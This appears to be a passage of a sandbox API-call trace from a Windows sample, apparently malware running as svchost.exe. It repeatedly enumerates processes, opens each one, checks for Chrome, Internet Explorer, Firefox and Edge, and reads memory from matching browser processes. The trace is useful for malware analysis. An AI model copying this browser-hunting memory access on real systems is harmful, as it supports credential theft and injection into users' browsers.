	[0247.600] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.601] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0247.602] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x9960
	[0247.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.602] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0247.602] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.602] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.603] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0247.603] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.603] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.604] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0247.605] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x9964
	[0247.605] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.605] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0247.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.606] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0247.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.606] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0247.606] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.606] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.606] NtQueryInformationProcess (in: ProcessHandle=0x9964, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0247.607] ReadProcessMemory (in: hProcess=0x9964, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0247.607] ReadProcessMemory (in: hProcess=0x9964, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0247.607] ReadProcessMemory (in: hProcess=0x9964, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0247.607] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0247.607] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0247.608] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x9968
	[0247.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.608] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0247.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.608] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0247.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.609] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0247.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.609] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.609] NtQueryInformationProcess (in: ProcessHandle=0x9968, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0247.609] ReadProcessMemory (in: hProcess=0x9968, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0247.609] ReadProcessMemory (in: hProcess=0x9968, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0247.610] ReadProcessMemory (in: hProcess=0x9968, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0247.610] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0247.610] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0247.611] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x996c
	[0247.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.611] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0247.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.612] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.612] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0247.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.612] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.613] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0247.613] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x9970
	[0247.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.614] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0247.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.614] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.614] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0247.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.615] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.615] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.616] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x9974
	[0247.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.616] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.616] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.616] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.617] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.617] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.617] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.618] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.619] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x9978
	[0247.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.619] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.625] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.626] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.626] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.626] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.627] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x997c
	[0247.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.627] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.628] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.628] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.628] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.628] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.629] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0247.629] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x9980
	[0247.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.630] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0247.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.630] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.631] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0247.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.631] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.631] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.632] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x9984
	[0247.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.633] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.633] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.633] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.634] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.634] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.635] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x9988
	[0247.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.636] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.636] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.636] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.637] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.637] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0247.638] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0x998c
	[0247.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.638] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0247.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.638] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.639] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0247.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.639] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.639] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0247.640] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0x9990
	[0247.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.640] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.640] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.641] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.641] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.641] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0247.642] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0x9994
	[0247.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.642] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0247.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.642] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.643] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0247.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.643] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.643] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0247.644] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0x9998
	[0247.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.644] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0247.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.645] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.645] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0247.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.645] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.646] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0247.646] CloseHandle (hObject=0x4fd0) returned 1
	[0247.646] Sleep (dwMilliseconds=0x64) 
	[0247.745] GetCurrentProcessId () returned 0x110
	[0247.745] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0247.749] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0247.751] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0247.752] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0247.754] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x999c
	[0247.754] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.754] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0247.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.755] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.755] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.755] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0247.756] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.756] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.756] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0247.757] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x99a0
	[0247.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.758] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0247.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.758] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.758] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.758] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0247.759] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.759] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.759] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0247.760] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x99a4
	[0247.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.760] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0247.760] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.760] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.761] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0247.761] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.761] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.761] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0247.762] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x99a8
	[0247.762] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.762] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0247.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.763] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.763] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.763] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0247.764] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.764] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.764] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0247.765] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x99ac
	[0247.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.765] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0247.765] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.766] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.766] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0247.766] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.767] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.767] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0247.768] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x99b0
	[0247.768] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.768] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0247.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.769] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0247.769] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.769] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0247.770] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.770] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0247.770] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0247.771] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x99b4
	[0247.771] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0247.771] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
